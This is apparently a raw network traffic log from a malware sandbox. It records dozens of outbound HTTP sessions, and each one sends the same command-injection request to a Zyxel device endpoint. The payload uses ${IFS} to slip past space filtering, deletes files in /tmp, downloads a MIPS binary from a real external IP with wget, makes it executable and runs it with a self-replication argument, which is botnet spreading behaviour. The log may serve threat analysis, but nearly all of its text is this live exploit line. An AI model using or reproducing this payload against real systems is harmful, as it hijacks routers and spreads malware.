                                    Jan 13, 2024 19:02:41.356168985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6314192.168.2.1356652171.14.57.231443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.356220961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6315192.168.2.134211289.30.74.219443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.356236935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6316192.168.2.135306077.180.53.135443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.356304884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6317192.168.2.135653479.159.42.187443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.356376886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6318192.168.2.1335080115.229.57.89443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.356446981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6319192.168.2.134207439.74.109.28443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.356523037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6320192.168.2.133311471.43.14.176443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.356559992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6321192.168.2.1357274112.113.241.75443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.356600046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6322192.168.2.13496162.22.220.200443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.356653929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6323192.168.2.1336824143.171.151.7443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.356714010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6324192.168.2.1336336158.71.250.130443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.356777906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6325192.168.2.1352902145.94.245.4443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.356837034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6326192.168.2.135804863.100.112.187443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.356889963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6327192.168.2.135813864.148.201.137443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.356916904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6328192.168.2.1359764182.223.146.107443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.357004881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6329192.168.2.133764672.244.133.136443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.357064009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6330192.168.2.1352772111.244.11.76443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.357140064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6331192.168.2.1334136210.113.201.58443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.357204914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6332192.168.2.135799884.44.53.33443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.357299089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6333192.168.2.134619634.40.98.130443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.357356071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6334192.168.2.1347642172.66.241.70443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.357429981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6335192.168.2.1333712172.178.54.140443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.357503891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6336192.168.2.135471252.122.235.233443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.357554913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6337192.168.2.134251243.65.75.99443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.357609987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6338192.168.2.134984273.38.251.54443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.365533113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6339192.168.2.1351476164.13.166.81443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.365714073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6340192.168.2.1356440181.54.148.45443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.365794897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6341192.168.2.136075274.23.103.213443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.365817070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6342192.168.2.1351688134.102.220.192443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.365936041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6343192.168.2.135432289.39.116.20443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.365952015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6344192.168.2.1360138181.67.29.16443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.366003990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6345192.168.2.1337340167.71.100.239443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.366055965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6346192.168.2.1345734171.143.169.6443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.366123915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6347192.168.2.1351526138.110.196.106443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.366180897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6348192.168.2.135249858.236.112.70443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.366234064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6349192.168.2.1334368135.25.181.89443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.366296053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6350192.168.2.135802620.162.254.238443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.366354942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6351192.168.2.1354138104.75.170.93443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.366410971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6352192.168.2.1342610223.231.125.29443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.366462946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6353192.168.2.1350798137.186.64.113443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.366549015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6354192.168.2.134853872.245.103.197443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.366580963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6355192.168.2.1335162213.24.212.69443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.366590977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6356192.168.2.134189632.226.204.61443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.366658926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6357192.168.2.1344494185.24.57.50443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.366739035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6358192.168.2.134641264.36.55.115443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.366777897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6359192.168.2.1349434168.165.176.130443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.366841078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6360192.168.2.133619489.44.43.131443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.366884947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6361192.168.2.134215641.75.206.176443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.366955042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6362192.168.2.1349934141.242.152.69443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.366987944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6363192.168.2.1346092201.57.81.137443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.367053032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6364192.168.2.1344076126.30.119.206443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.367110968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6365192.168.2.134714048.97.166.160443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.367146015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6366192.168.2.135951269.153.151.169443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.367192984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6367192.168.2.1360242105.220.34.86443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.367281914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6368192.168.2.134097877.53.244.76443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.367337942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6369192.168.2.133343241.32.245.61443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.367404938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6370192.168.2.1337106109.218.157.119443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.367485046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6371192.168.2.1348318185.52.200.37443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.367548943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6372192.168.2.1339218198.160.140.80443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.367615938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6373192.168.2.134495213.167.47.192443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.367636919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6374192.168.2.1342798208.24.241.230443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.367712021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6375192.168.2.135017840.160.254.206443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.367758036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6376192.168.2.1352478138.242.141.3443
                                    TimestampBytes transferredDirectionData
